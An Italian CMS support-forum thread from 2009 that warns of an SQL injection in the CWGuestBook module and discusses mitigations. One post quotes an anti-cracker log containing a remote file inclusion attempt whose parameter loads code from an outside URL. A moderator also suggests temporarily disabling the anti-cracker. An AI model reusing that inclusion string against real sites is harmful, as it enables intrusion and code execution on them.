| Autore |
Messaggio |
cradle Moderatore
Registrato: 26 Apr 2004
Messaggi: 858
Località: Piedimonte Matese
Profilo
|
  Inviato:
02 Lug 2009 - 08:04 |
|
| Oggetto: [exploit sql injection] Moduli sotto attacco |
Avvisiamo gli utenti che e' stato scoperto un bug nel modulo CWguestbook che permette tramite l'inserimento di un apposito link di appropriarsi del nomeutente e password ( in forma md5 ) del admin.
| Codice:
|
################################################################### ###################
# #
# Author: Dante90, WaRWolFz Crew #
# Title: [0-Day] MDPRO CWGuestBook <= v2.1 Mod Remote SQL Injection #
# #
###################################################################### ################
[0-Day] MDPRO CWGuestBook <= v2.1 Mod Remote SQL Injection By Dante90
|
per evitare brutte sorprese e' indispensabile disattivare il modulo suddetto oppure di sostituirlo con guestbook che trovate in areafiles
---------------------------------------------------------------------- -----------------
Lo stesso vale per i moduli moduli Surveys e NS-POLLS |
|
|
Rispondi citando  |
|
|
MAXdev Info
MAXdev vi informa
|
| Inviato:
02 Lug 2009 - 08:04 |
|
|
|
| |
|
gaetavMD Junior
Registrato: 31 Dic 1969
Messaggi: 142
Località: Roma
Profilo
|
| Inviato:
02 Lug 2009 - 10:23 |
|
|
Grazie. Ho subito disinstallato il modulo.
Comunque, almeno per quello che mi riguarda, non mi sembra che ci sia come una volta tutta questa voglia di lasciare i messaggi sui guestbook. Non so voi.
Bye |
_________________
www.cucinet.com
Scrittura & Cucina |
|
| Rispondi citando |
|
SkinModeratore
Registrato: 04 Dic 2002
Messaggi: 1778
Località: Lucca
Profilo
|
| Inviato:
02 Lug 2009 - 10:55 |
|
|
Ricordate di usare password più sicure, almeno per gli accounts di amministrazione.
Le password semplici, composte di sole parole e soprattutto se hanno significato le decriptano in un secondo; una password sicura è composta da lettere maiuscole e minuscole, da numeri e da simboli vari.
Se la password è sufficientemente complessa devono impiegare un pc per un attacco bruteforce e possono impiegare giorni o settimane, nel frattempo potrebbero stufarsi oppure potrebbe esserci già una pacth in giro. |
_________________
www.pointnet.it: web design; templates per il web; temi per MDPro | Oscommerce | Autotheme | Autorender |
|
| Rispondi citando |
|
DarknessMD Junior
Registrato: 31 Dic 1969
Messaggi: 117
Località: Crotone
Profilo
|
| Inviato:
02 Lug 2009 - 11:12 |
|
|
Il sito hackerato era il mio... ed io stesso ho potuto notare come funzionava quel maledettissimo codice...
in parole povere se inserito dava la possibilità di vedere il nick dell'admin e la password ad esso associato in versione md5... io stesso usando uno dei tanti siti che offrono la decodifica della password ho visto svelare la mia password in pochi secondi, inutile dire che ho ripristinato il sito, rimosso il modulo cwguestbook da tutti i miei siti e dai siti che indirettamente gestisco per amici vari... e sostituiro con il modulo guestbook, e cosa ben più impòortante ho cambiato password...
la prossima volta starò più attento...
Darkness |
_________________
I per cui chiedo assistenza in quanto miei sono:
http://www.lacinium.com
http://www.passionecacciaepesca.net |
|
| Rispondi citando |
|
TiMaxProject Manager e fondatore
Registrato: 16 Apr 2005
Messaggi: 4847
Località: Montreal Canada - Bergamo Italy
Profilo
|
| Inviato:
02 Lug 2009 - 13:59 |
|
|
sarebbe anche cosa buona se cambi la crittografia della password da MD5 ormai desueto a SHA1 |
_________________
TiMax
MAX s.o.s. supporta questi progetti supporta anche tu MAX s.o.s.
Vuoi aggiornare e/o mantenere aggiornato il tuo sito e non hai il tempo e/o le competenze per farlo ?
Contattaci, potrai avere servizi professionali fatti su misura per te, numero verde 800 032 883
Sei un webmaster o un rivenditore ? stiamo preparando nuovi prodotti e servizi proprio per te, contatta MAX s.o.s.
MAX s.o.s. Fantasia e dinamicità Italiane, qualità e servizi Canadesi Web Services, hosting ed housing professionali
Realizzazione siti web, portali dinamici, E-commerce, moduli ed addons per portali.
Supporto tecnico 24/24 7/7 - Contratti assistenza e manutenzione -
Galleria con migliaia di temi grafici disponibile.
<a href="http://www.twitter.com/timaxsos"><img src="http://twitter-badges.s3.amazonaws.com/twitter-a.png" alt="Follow timaxsos on Twitter"/></a>
Per ottenere supporto tecnico inserite il link al vostro sito |
|
| Rispondi citando |
|
milhausMatricola
Registrato: 01 Mar 2004
Messaggi: 64
Profilo
|
| Inviato:
06 Lug 2009 - 04:55 |
|
|
Volevo segnalare che recentemente ricevo spesso notifiche per tentativi di attacco sul modulo MDForum da sever coreani o similari (credo zombie).
Non riescono, ma ci provano praticamente ogni giorno.
Ciao
| Codice:
|
=====================================
Information about this user:
=====================================
This person is not logged in.
IP numbers: [note: when you are dealing with a real cracker these IP numbers might not be from the actual computer he is working on]
IP according to HTTP_CLIENT_IP:
IP according to REMOTE_ADDR: 82.165.156.112
IP according to GetHostByName($_SERVER['REMOTE_ADDR']): 82.165.156.112
=====================================
Browser information
=====================================
HTTP_USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6
BROWSER * 0 :
=====================================
Information in the $_GET array
This is about variables that may have been in the URL string or in a 'GET' type form.
=====================================
GET * name : MDForum
GET * file : viewtopic
GET * t : 29\" target=\"_blank/modules/MDForum/includes/functions_admin.php?phpbb_roo t_path=http://anthony-campbell.com/public/cfg??
=====================================
Information in the $_POST array
This is about visible and invisible form elements.
=====================================
=====================================
Information in the $_COOKIE array
=====================================
=====================================
Information in the $_FILES array
=====================================
=====================================
Information in the $_SESSION array
This is session info. The variables
starting with MDSV are MDPro SessionVariables.
=====================================
SESSION * MDSVrand : 321691153
SESSION * MDSVlang : ita
|
|
_________________
Sir, if you were my husband, I would poison your drink.
Madam, if you were my wife, I would drink it.
Lady Astor to Winston Churchill |
|
| Rispondi citando |
|
cradleModeratore
Registrato: 26 Apr 2004
Messaggi: 858
Località: Piedimonte Matese
Profilo
|
| Inviato:
06 Lug 2009 - 14:53 |
|
|
Prova a disabilitare per un giorno l'anticracker oppure a diminuire il livello di sicurezza da alto a medio da preferenze |
|
|
| Rispondi citando |
|
Le ultime dal forum
Cerca
Options forum
Gruppi utenti
Discussioni controllate
Tutti i loghi e marchi in questo sito sono di proprietà dei rispettivi proprietari.